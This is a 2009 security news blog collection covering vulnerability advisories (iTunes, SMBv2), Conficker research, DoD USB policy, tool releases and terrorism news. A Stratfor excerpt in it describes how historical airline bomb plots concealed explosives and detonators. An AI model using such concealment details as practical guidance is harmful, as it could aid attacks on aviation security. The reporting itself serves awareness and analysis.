Metasploit Unleashed - Mastering the Framework

This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.

This is the free online version of the course. If you enjoy it and find it useful, we ask that you make a donation to the HFC (Hackers For Charity), $4.00 will feed a child for a month, so any contribution is welcome. We hope you enjoy this course as much as we enjoyed making it.

The "full" version of this course includes a PDF guide (it has the same material as the wiki) and a set of flash videos which walk you though the modules. You may purchase these materials from the Offensive Security Training page. All proceeds from this course go to HFC.

DoD Preparing To Lift USB Ban

Via -

The ban on USB drives that began late last year in the U.S. Defense Department will be lifted, but with a caveat: Only DoD-approved or procured devices will be allowed.

Robert Cary, CIO for the U.S. Navy, in a recent blog post said Defense officials are hashing out the final policy for allowing USBs back into the department. The Commander of the U.S. Strategic Command in November suspended the use of all USB flash and removable storage devices and camera flash cards from all DoD networks after a worm infection spread across some DoD networks.

"In the future, we expect that a government-owned and procured USB flash media that is uniquely and electronically identifiable for use in support of mission-essential functions on DoD networks will be permitted for use by authorized individuals," Cary said in his blog. "The bottom line is, the days of using personally owned flash media or using flash media collected at conferences or trade shows are long gone. What we connect to our home PCs is very different from what is and will be allowed to occur on DON [Department of Navy] networks."

The Navy is also reducing its reliance on USB flash media, Cary said. "...we are working on moving our access to information to the use of collaborative workspaces, file shares and portals within our protected enclaves. This will reduce our reliance on USB flash media, mitigate unnecessary risk to the GIG, and protect our data and information by keeping it stored within our network boundaries," he said.

Meanwhile, the DoD Removable Storage Media Tiger Team is coordinating a Defense USB policy that will be incorporated into USSTRATCOM guidelines, and the Navy and Marine Corps are working on their own organization-specific operational orders for when the ban is lifted.

Among other things, the Navy is upgrading its antivirus and malware detection, alerting, and remediation, Cary said, and improving controls that deny unauthorized USBs from the network.

Cary noted that although the DoD previously had policies in place for using USBs safely, "they were not being followed."

"Unfortunately, it was our bad IT hygiene that resulted in the ban of this all too flexible use of storage media," he said.

Suppressed Texas Instruments Cryptographic Signing Keys

Texas Instruments, a large US electronics company, is the market leader for sophisticated programable calculators used by millions of students and engineers. Recently, TI has served internet publishers with DMCA legal threats for distributing cryptographic keys that permit owners of TI calculators to install third-party system software on TI calculators -- an anti-competitive, and arguably unethical act by TI.

The file here presents the Operating System signing keys for different Texas Instruments calculators. The key for the TI-83 calculator was first published by someone at the forum. He or she needed several months to crack it. The other keys were found after a few weeks by the community through a distributed computing project. The keys make it possible for people to create new OS software to be used on Texas Instruments calculators.

Texas Instruments contacted several people with DMCA notices to take down the keys from their websites. Some of the websites which got a DMCA notice are:, and One of these DCMA notices can be found here:



More TI signing keys are on Wikileaks as well...,_28_Aug_2009

NRC Report: Technology, Policy, Law, and Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities

The National Research Council (NRC) functions under the auspices of the National Academy of Sciences (NAS), the National Academy of Engineering (NAE), and the Institute of Medicine (IOM). The NAS, NAE, IOM, and NRC are part of a private, nonprofit institution that provides science, technology and health policy advice under a congressional charter signed by President Abraham Lincoln that was originally granted to the NAS in 1863. Under this charter, the NRC was established in 1916, the NAE in 1964, and the IOM in 1970. The four organizations are collectively referred to as the National Academies.


Report looks to have been put together by the Committee on Offensive Information Warfare & the Computer Science and Telecommunications Board (CSTB)

Somalia's Al-Shabab Releases Video Vowing Allegiance to Osama Bin Laden

Via Yahoo! News (AP) -

An Islamic insurgent group that controls much of lawless Somalia has released a video showing its members vowing allegiance to Osama bin Laden, training in dusty camps and slamming Somalia's U.S.-backed president as a traitor.

The tape was released late Sunday by al-Shabab, an insurgent group that last week hit the African Union peacekeeping base with suicide car bombs, killing 21 people in the deadliest single attack on peacekeepers since they arrived in 2007.

Al-Shabab announced the Thursday attack at Mogadishu's airport was in retaliation for a U.S. commando raid on Sept. 14 that killed al-Qaida operative Saleh Ali Saleh Nabhan in southern Somalia.

The United States has become increasingly concerned that al-Qaida insurgents are moving into anarchic Somalia, where they can mobilize recruits without interference.

The video showed the Shabab militia in training, leaping over piles of sandbags, crawling on the ground and shooting at targets. White-skinned bearded trainers could be seen moving among the Somalis. The video also showed crowds chanting: "At your service Osama!"

Sheik Hassan Ya'qub, a spokesman for al-Shabab, said the video is "aimed at showing how the youth are well-trained and ready to the defend their holy land." Shabab means "youth" in Arabic.

Bin Laden has declared his support for Somali insurgents before. The new video shows the mutual affection is strong as ever — a growing concern for U.S. and other governments. Al-Qaida bombed the U.S. embassies in Kenya and Tanzania in 1998, killing more than 200 people, and one of the alleged plotters is believed to be hiding out in Somalia. Stronger ties between al-Qaida and al-Shabab could pose greater threats to Western interests in the region.

The video features periodic commentary from a voice purported to be bin Laden's, criticizing the administration of Somali President Sheik Sharif Sheik Ahmed as un-Islamic for its ties to America. Sharif met last month with U.S. Secretary of State Hillary Rodham Clinton, who pledged to expand American support for Somalia's government.

The comments from the al-Qaida leader echo comments of support he made in March. It was not immediately clear if they were from the same recording.


The segment of video that is dedicated to Osama bin Laden and Mullah Omar can be seen over @ The Long War Journal. The tape appears to be Shabaab's signal that it has joined Al Qaeda.

A Stick Figure Guide to the Advanced Encryption Standard (AES)

Check out the AES's full story....

Addendum to SRI's Conficker C Analysis Published


SRI recently updated their Conficker C analysis with another addendum, this one covers Conficker C's P2P protocol and implementation. Here's the abstract of the new addendum:

This report presents a reverse engineering of the obfuscated binary code image of the Conficker C peer-to-peer (P2P) service, captured on 5 March 2009 (UTC). The P2P service implements the functions necessary to bootstrap an infected host into the Conficker P2P network through scan-based peer discovery, and allows peers to share and spawn new binary logic directly into the currently running Conficker C process. Conficker's P2P logic and implementation are dissected and presented in source code form. The report documents its thread architecture, presents the P2P message structure and exchange protocol, and describes the major functional elements of this module.

As always, this is a GREAT report from the Malware Threat Center at SRI.

Apple iTunes ".pls" Processing Buffer Overflow Vulnerability


A vulnerability has been reported in Apple iTunes, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in the processing of ".pls" files and can be exploited to cause a buffer overflow.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is reported in version 9 for Windows and Mac.

Update to version 9.0.1.

The vendor credits Steven Woolley at Oogli LLC.

Original Advisory:

CVE reference:


Tuesday, September 22, 2009

New ICSA Labs Service Certifies Security Of Printers, Copiers & ATMs

Via -

If a toaster can be hacked, then there ought to be a way for toaster manufacturers -- and the enterprises that use them -- to find out whether their toasters are safe to use.

This simple idea is behind a pair of security certification and assessment services launched today by ICSA Labs, an independent division of Verizon Business. The new services are designed to test the security of nonmainstream networked devices, such as printers, copiers, faxes, security cameras, and point-of-sale systems.

ICSA Labs is offering a vendor certification program and comprehensive enterprise assessment service that are designed to test the security of devices that connect directly to a network, but are not part of the network infrastructure itself. This list includes ATM machines, digital signs, proximity readers, and facility management systems for power, lighting, and HVAC systems, ICSA says.

Numerous proofs-of-concept have been demonstrated on nonmainstream devices at various conferences during the years. This year's Black Hat conference, for example, featured a demonstration of hacks on networked parking meters, while previous years' conferences included hacks of toasters, soda machines, and even medical implants.

"There is a growing base of networked devices out there, everything from those multifunction devices that do printing, faxing, and scanning to specialized devices that are used in specific industries," says George Japak, managing director at ICSA Labs. "Any one of these could potentially be a threat to your network, or a vulnerability in one of these devices could cause you to fall out of compliance with standards like PCI or HIPAA."

ICSA Labs is offering Network Attached Peripheral Security (NAPS) certification, which helps manufacturers identify and remediate existing and potential vulnerabilities in their networked devices. The second new offering, NAPS assessment, helps enterprises determine through a one-time evaluation whether network-attached devices are installed securely and protected from exploitation.

A new white paper from ICSA Labs, Living on the Edge" (PDF), examines network-attached peripherals and the security risks they pose.

"This will be an even greater issue down the road, as companies deal not only with older networked devices, such as printers and copiers, but with next-generation technology that takes advantage of wireless and remote networks," Japak says.

Al-Qaeda Threatens German Post Election Attack

Via Shimron Letters -

A senior al Qaeda leader has threatened to attack Germany just days before the nation will go to the polls to choose a new Chancellor.

Bekkay Harrach, alias Al Hafidh Abu Talha al Almani, resurfaced Friday in a chilling new video produced by al Qaeda's al Fajr Media Center and distributed across the major jihadi Web forums.

Dressed in an ill-fitting black blazer, blue tie, and shoulder-length greased hair - looking more like a teenager dressed for his first job interview - he slammed Germany for its military presence in Afghanistan and warned that if Chancellor Angela Merkel is reelected on Sept. 27, Germany will be directly attacked.

His previous warning to Germany, on Jan. 17, 2009, coincided with a massive car bomb attack on the heavily guarded German embassy in Kabul that was orchestrated by the notorious Haqqani Network. Four Afghan civilians and an American soldier died in the attack.

"The vote on September 27 is more than a choice between a man and a woman," he warned in the new video, which was acquired by the Long War Journal.
"As an old aphorism says, 'Security is foremost.'

In the democratic system, only the people can return the soldiers to their homeland. If the people insist on continuing the war (in Afghanistan), they sentence themselves to retaliation and clearly show the world that civilians in the democratic system are not innocent people."

He addressed Germany's Muslim community and said

"(S)tay clear of all that is not necessary in the two weeks of the elections if the German people did not decide to withdraw its soldiers from Afghanistan.

Keep your children near you at this time. Ask God to bless you and your children."

"The city of Kiel," he continued inexplicably, "will remain a safe city no matter how long the conflict in Germany. This is a promise from me."


More on this story and Bekkay Harrach can be found over at The Long War Journal...
Harrach is a 32-year-old Moroccan whose family emigrated to Germany when he was two years old; he became a naturalized German citizen in 1997. Harrach has become a rising star in al Qaeda's new generation and is reportedly on its shura council for global strikes. Reports suggest that his travels are tracked by intelligence agencies, however, according to Spiegel Online, he is directly protected by Siraj Haqqani and his deadly network.

Monday, September 21, 2009

In Memory of DJ Roc Raida

1995 DMC World DJ Champion - Roc Raida

X-Ecutioner member and Busta Rhymes' personal deejay, Anthony "DJ Roc Raida" Williams, has passed on.....Williams passed away on Saturday September 19, 2009, due to complications from a mixed-martial-arts accident, according to a statement released by his family. He had been released to an inpatient physical therapy facility at the time of his death.

Busta announced the unexpected news via his Twitter account Saturday afternoon.
"I am sorry 2 say that on this day at 2:05 Sept 19th we lost another incredible life...Dj Roc Raida died 2day my personal Dj is gone... I just wanna thank everyone 4 ur love and support and ur prayers...We will never let ur name die Roc...We love u and will 4ever miss u...RIP." (Busta Rhymes' Twitter)

RIP Roc Raida

Update on the SMB Vulnerability Situation

Via Microsoft's SVD Blog -

We’d like to give everyone an update on the situation surrounding the new Microsoft Server Message Block Version 2 (SMBv2) vulnerability affecting Windows Vista and Windows Server 2008.


Easy way to disable SMBv2

Until the security update is released, the best way to protect systems from this vulnerability is to disable support for version 2 of the SMB protocol. The security advisory was updated yesterday with a link to the Microsoft Fix It package that disables SMBv2 and then stops and starts the Server service. (This initial Fix It might prompt you to also restart the Browser service.)


Disabling SMBv2 may slow down SMB connections between Windows Vista and Windows Server 2008 machines.

First exploit for code execution released to small number of companies

We are not aware of any in-the-wild exploits or any real-world attacks.

However, we are aware of exploit code developed by Immunity Inc. and released to customers who subscribe to the CANVAS Early Updates program. We have analyzed the code ourselves and can confirm that it works reliably against 32-bit Windows Vista and Windows Server 2008 systems. The exploit gains complete control of the targeted system and can be launched by an unauthenticated user.

The exploit can be detected by intrusion detection systems (IDS) and firewalls that have signatures for the vulnerability being targeted (CVE-2009-3103).

This exploit code from Immunity is only available to a small group of companies and organizations who will use it to determine the risk to their own networks and systems, or those of their customers. (We are aware that other groups are actively working on exploit code which is likely to be made public when it is completed).

Sunday, September 20, 2009

Convergence: The Challenge of Aviation Security

Via Stratfor (Global Security & Intelligence Report) -


The airline security paradigm changed on 9/11. In spite of the recent statement by al Qaeda leader Mustafa Abu al-Yazid that al Qaeda retains the ability to conduct 9/11-style attacks, his boast simply does not ring true. After the 9/11 attacks there is no way a captain and crew (or a group of passengers for that matter) are going to relinquish control of an aircraft to hijackers armed with box cutters — or even a handgun or IED. A commercial airliner will never again be commandeered from the cockpit and flown into a building — especially in the United States.

Because of the shift in mindset and improvements in airline security, the militants have been forced to alter their operational framework. In effect they have returned to the pre-9/11 operational concept of taking down an aircraft with an IED rather than utilizing an aircraft as human-guided missile. This return was first demonstrated by the December 2001 attempt by Richard Reid to destroy American Airlines Flight 63 over the Atlantic with a shoe bomb and later by the thwarted 2006 liquid-explosives plot. The operational concept in place now is clearly to destroy rather than commandeer. Both the Reid plot and the 2006 liquid-bomb plot show links back to the operational philosophy evidenced by Operation Bojinka in the mid-1990s, which was a plot to destroy multiple aircraft in flight over the Pacific Ocean.

The return to Bojinka principles is significant because it represents not only an IED attack against an aircraft but also a specific method of attack: a camouflaged, modular IED that the bomber smuggles onto an aircraft in pieces and then assembles once he or she is aboard and well past security. The original Bojinka plot used baby dolls to smuggle the main explosive charge of nitrocellulose aboard the aircraft. Once on the plane, the main charge was primed with an improvised detonator that was concealed inside a carry-on bag and then hooked into a power source and a timer (which was disguised as a wrist watch). The baby-doll device was successfully smuggled past security in a test run in December 1994 and was detonated aboard Philippine Air Flight 434.

The main charge in the baby-doll devices, however, proved insufficient to bring down the aircraft, so the plan was amended to add a supplemental charge of liquid triacetone triperoxide (or TATP, aptly referred to as “Mother of Satan”), which was to be concealed in a bottle of contact lens solution. The plot unraveled when the bombmaker, Abdel Basit (who is frequently referred to by one of his alias names, Ramzi Yousef) accidentally started his apartment on fire while brewing the TATP.


The biggest difference between Bojinka and more recent plots is that the Bojinka operatives were to smuggle the components aboard the aircraft, assemble the IEDs inside the lavatory and then leave the completed devices hidden aboard multi-leg flights while the operatives got off the aircraft at an intermediate stop. The more recent iterations of the jihadist airplane-attack concept, including Richard Reid’s attempted shoe bombing and the 2006 liquid-bomb plot, planned to use suicide bombers to detonate the devices midflight. The successful August 2004 twin aircraft bombings in Russia by Chechen militants also utilized suicide bombers.

The shift to suicide operatives is not only a reaction to increased security but also the result of an evolution in ideology — suicide bombings have become more widely embraced by jihadist militants than they were in the early 1990s. As a result, the jihadist use of suicide bombers has increased dramatically in recent years. The success and glorification of suicide operatives, such as the 9/11 attackers, has been an important factor in this ideological shift.

One of the most recent suicide attacks was the Aug. 28 attempt by al Qaeda in the Arabian Peninsula (AQAP) to assassinate Saudi Prince Mohammed bin Nayef. In that attack, a suicide operative smuggled an assembled IED containing approximately one pound of high explosives from Yemen to Saudi Arabia concealed in his rectum. While in a meeting with Mohammed, the bomber placed a telephone call and the device hidden inside him detonated.


The section above is only a small part of the article...worth a full read, follow the link above.

Tools of the Trade - NOVA Edition

NOVA is my new I figured I would give you some information about the area.

Northern Virginia (colloquially referred to as "NOVA") consists of several counties and independent cities in the U.S. state of Virginia in a widespread region generally radiating southerly and westward from Washington, D.C. Notable features of the region include the Pentagon and the Central Intelligence Agency, and the many companies which serve them and the federal government. The area's attractions include various monuments and Colonial and Civil War-era sites such as Mount Vernon and Arlington National Cemetery.

Northern Virginia's data centers currently carry more than 50% of the nation's Internet traffic, and by 2012 Dominion Power expects that 10% of all electricity it sends to Northern Virginia will be used by the region's data centers alone.


On Sept 16th, Adam Laurie, known as Major Malfunction in the hacker community, released RFIDIOt 0.1z. RFIDIOt is a python library for exploring RFID device. It currently drives a couple of RFID readers made by ACG, called the HF Dual ISO and the LFX. Includes sample programs to read/write tags and the beginnings of library routines to handle the data structures of specific tags like MIFARE(r). Check his announcement e-mail for all the change details.

On Sept 16th, Snort 2.8.5 was released. Here are some highlights from the release notes:
  • Ability to specify multiple configurations (snort.conf and everything it includes), bound either by Vlan ID or IP Address. This allows you to run one instance of Snort with multiple snort.conf files, rather than having separate processes.
  • Continued inspection of traffic while reloading a configuration.
    Add --enable-reload option to your configure script prior to building.
  • Rate Based Attack Prevention for Connection Attempts, Concurrent Connections, and improved rule/event filtering.
  • SSH preprocessor is no longer experimental
  • Multiple performance improvements
On Sept 15th, Nessus 4.02 was released. This release includes several fixes and support for the latest operating systems from Microsoft and Apple (i.e. Windows 7 and Snow Leopard). All customers are encouraged to upgrade to the latest version of the Nessus Server and NessusClient.

On Sept 15th, Wireshark 1.2.2 was released. This release fixes the following vulnerabilities:
  • The GSM A RR dissector could crash. (Bug 3893) - Versions affected: 1.2.0 to 1.2.1
  • The OpcUa dissector could use excessive CPU and memory. (Bug 3986) - Versions affected: 0.99.6 to 1.0.8, 1.2.0 to 1.2.1
  • The TLS dissector could crash on some platforms. (Bug 4008) - Versions affected: 1.2.0 to 1.2.1
On Sept 14th, KeePassX 0.4.1 was released. KeePassX is an open-source application for people with extremely high demands on secure personal data management. KeePassX saves many different information e.g. user names, passwords, URLs, attachments and comments in one single database. Basically, it is Keepass Password Safe for Apple OS X. Check the changelog for all the details.

On Sept 11th, Harald Scan 0.31 was released. Harald Scan is a Bluetooth discovery scanner written in Python. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. This Linux-only release adds a -u option to update MACLIST to the most recent version, adds a proper GPLv3 disclaimer and license and fixes other minor bugs (mostly not noticed by users).

On Sept 10th, PDFResurrect 0.8 was released. PDFResurrect is a tool aimed at analyzing PDF documents. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also "scrub" or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read. This release is mainly just a bug-fix.

On Sept 9th, VirtualBox 3.0.6 was released. VirtualBox is a general-purpose full virtualizer for x86 hardware. Targeted at server, desktop and embedded use, it is now the only professional-quality virtualization solution that is also Open Source Software. Check the changelog for all the details.

On Sept 8th, CDBurnerXP was released. CDBurnerXP is a free application to burn CDs and DVDs, including Blu-Ray and HD-DVDs. It also includes the feature to burn and create ISOs, as well as a multilanguage interface. This version added a verification method for the file count of the disc to detect broken file system structures.

On Sept 8th, Aircrack-ng 1.0 was released. Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. Check out the official Aircrack-ng blog for changelog highlights.

On Sept 4th, GnuPG 2.0.13 & 1.4.10 were released. The GNU Privacy Guard (GnuPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data, create digital signatures, help authenticating using Secure Shell and to provide a framework for public key cryptography. Check the announce notes for both 2.0.13 & 1.4.10 for all the change details.

On Sept 3rd, CCleaner v2.23.999 was released. CCleaner is a freeware system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. This version has improved Opera 10 support. Check the version history for all the change details.

On Sept 3rd, Foxit Reader was released. Foxit Reader is a free PDF document viewer, with incredible small size, breezing-fast launch speed and rich feature set. Its core function is compatible with PDF Standard 1.7. This released fixes at least two issues:
  • The reported issue of Foxit Reader crashing when users are viewing certain PDF files has been updated and is no longer a problem.
  • Fixed an issue where Foxit Reader may not be launched in the system without installing Microsoft Visual C++ 2005 Redistributable.
On Sept 2nd, Mobius Forensic Toolkit 0.4.7 was released. Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Check the release notes for the change details.

On Sept 1st, OpenOffice 3.1.1 was released. 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. This version is mostly just a bug-fix and did not include a host of new features....but it does address two highly critical Word Document Table Parsing Vulnerabilities. Check the release notes for all the change details.